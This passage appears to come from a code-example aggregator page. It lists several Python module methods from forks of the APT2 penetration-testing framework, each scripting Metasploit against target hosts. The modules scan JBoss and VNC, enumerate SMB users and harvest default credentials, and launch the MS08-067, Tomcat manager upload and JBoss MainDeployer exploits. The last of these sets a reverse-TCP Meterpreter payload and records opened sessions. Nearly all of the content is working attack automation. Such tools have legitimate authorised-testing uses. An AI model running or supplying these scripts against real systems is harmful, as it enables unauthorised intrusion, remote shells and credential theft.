                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is None):
                            result = result + msf.getResult()

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                        # Extract usernames from results and add to KB
                        parts = re.findall(".* users: .*", result)
                        for part in parts:
                            userlist = (part.split(':')[2]).split(',')
                            for username in userlist:
                                kb.add("host/" + t + "/user/" + username.strip())

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 20

Arquivo: scan_msf_jboss_vulnscan.py Projeto: MooseDojo/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/' + t + '/tcp')
                for p in ports:
                    # verify we have not tested this host before
                    if not self.seentarget(t+p):
                        # add the new IP to the already seen list
                        self.addseentarget(t+p)
                        myMsf.lock.acquire()
                        self.display.verbose(self.shortName + " - Connecting to " + t)
                        msf.execute("use auxiliary/scanner/http/jboss_vulnscan\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set RPORT %s\n" % p)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        result = msf.getResult()
                        myMsf.lock.release()
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"    ))
                        for line in result.splitlines():
                            m = re.match(r'.*Authenticated using (.*):(.*)', line)
                            if (m):
                                self.display.error("Jboss on [" + t + ":" + p + "] has default creds of [" +
                                        m.group(1).strip() +"]/[" + m.group(2).strip() + "]")
                                kb.add("creds/service/jboss/" + t + "/port/" + p + "/username/"
                                        + m.group(1).strip() + "/password/" + m.group(2).strip())
                                self.fire("newJbossPassword")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 21

Arquivo: msf_vncnoneauth.py Projeto: 0x0mar/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/vnc/vnc_none_auth\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*identified the VNC 'none' security type.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "VNCNoAuth", {"message": str(part), "output": outfile.replace("/", "%2F")})

            if callFire:
                self.Fire("vncAccess")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 22

Arquivo: exploit_msf_ms08_067.py Projeto: heikipikker/apt2-1

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    myMsf.lock.acquire()
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use exploit/windows/smb/ms08_067_netapi\n")
                    msf.execute("set TARGET 0\n")
                    msf.execute("set RHOST " + t + "\n")
                    msf.execute("exploit -j\n")
                    msf.sleep(int(self.config['msfexploitdelay']))

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    result = msf.getResult()
                    myMsf.lock.release()
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                    parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                    for part in parts:
                        self.fire("msfSession")
                        self.display.verbose("NEW session on : " + t)
                        kb.add("hell" + t + "/msf/" + str(part))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 23

Arquivo: msf_smbuserenum.py Projeto: zamil2200/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=self.config['msfport'],
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is
                           None):
                        result = result + msf.getResult()

                    # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
                    parts = re.findall(".*" + t.replace(".", "\.") + ".*",
                                       result)
                    for part in parts:
                        if "RHOSTS" in part:
                            pass
                        else:
                            try:
                                pieces = part.split()
                                domain = pieces[3]
                                kb.add("domain/" + domain.strip() + "/host/" +
                                       t)
                                extras = part.split('(')[1].split(')')[0]
                                users = part.split('[')[3].split(']')[0].split(
                                    ',')
                                for user in users:
                                    kb.add("host/" + t + "/user/" +
                                           user.strip())
                            except:
                                pass
                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" +
                           outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 24

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/host/' + t + '/tcpport')
                for p in ports:
                    users = kb.get("creds/host/" + t + "/port/" + p +
                                   "/service/tomcat/username")
                    for user in users:
                        passwords = kb.get("creds/host/" + t + "/port/" + p +
                                           "/service/tomcat/username/" + user +
                                           "/password")
                        for password in passwords:
                            # verify we have not tested this host before
                            if not self.seentarget(t + p + user + password):
                                # add the new IP to the already seen list
                                self.addseentarget(t + p + user + password)
                                self.display.verbose(self.shortName +
                                                     " - Connecting to " + t)
                                msf.execute(
                                    "use exploit/multi/http/tomcat_mgr_upload\n"
                                )
                                msf.execute("set RHOST %s\n" % t)
                                msf.execute("set RPORT %s\n" % p)
                                msf.execute("set USERNAME %s\n" % user)
                                msf.execute("set PASSWORD %s\n" % password)
                                msf.execute("set fingerprintcheck false\n")
                                msf.execute("set target 1\n")
                                msf.execute("exploit -j\n")
                                msf.sleep(int(self.config['msfexploitdelay']))

                                outfile = self.config[
                                    "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                        10)
                                result = msf.getResult()
                                Utils.writeFile(result, outfile)

                                parts = re.findall(".*Meterpreter session.*",
                                                   result)
                                for part in parts:
                                    callFire = True
                                    self.addVuln(
                                        t, self.shortName, {
                                            "port": p,
                                            "username": user,
                                            "password": password,
                                            "output": outfile.replace(
                                                "/", "%2F")
                                        })
                                    kb.add("host/" + t + "/files/" +
                                           self.shortName + "/" +
                                           outfile.replace("/", "%2F"))

            if callFire:
                self.fire("msfSession")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 25

Arquivo: exploit_msf_jboss_maindeployer.py Projeto: MooseDojo/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/' + t + '/tcp')
                for p in ports:
                    #users = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username")
                    #for user in users:
                    #    passwords = kb.get("creds/host/" + t + "/port/" + p + "/service/jboss/username/" + user + "/password")
                    #    for password in passwords:
                    #        # verify we have not tested this host before
                    #        if not self.seentarget(t+p+user+password):
                    #            # add the new IP to the already seen list
                    #            self.addseentarget(t+p+user+password)
                                myMsf.lock.acquire()
                                self.display.verbose(self.shortName + " - Connecting to " + t)
                                msf.execute("use exploit/multi/http/jboss_maindeployer\n")
                                msf.execute("set RHOST %s\n" % t)
                                msf.execute("set RPORT %s\n" % p)
                                msf.execute("set SVHOST %s\n" % self.config['lhost'])
                    #            msf.execute("set httpusername %s\n" % user)
                    #            msf.execute("set httppassword %s\n" % password)
                                msf.execute("set target 2")
                                msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp")
                                msf.execute("set LPORT 4445")

                                msf.execute("set fingerprintcheck false\n")
                                msf.execute("exploit -j\n")
                                msf.sleep(int(self.config['msfexploitdelay']))

                                outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                                result = msf.getResult()
                                myMsf.lock.release()
                                Utils.writeFile(result, outfile)

                                parts = re.findall(".*Meterpreter session.*", result)
                                for part in parts:
                                    callFire = True
                                    self.addVuln(t, self.shortName, {"port": p, "username": user, "password": password, "output": outfile.replace("/", "%2F")})
                                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"    ))

            if callFire:
                self.fire("msfSession")

            # clean up after ourselves
            result = msf.cleanup()

        return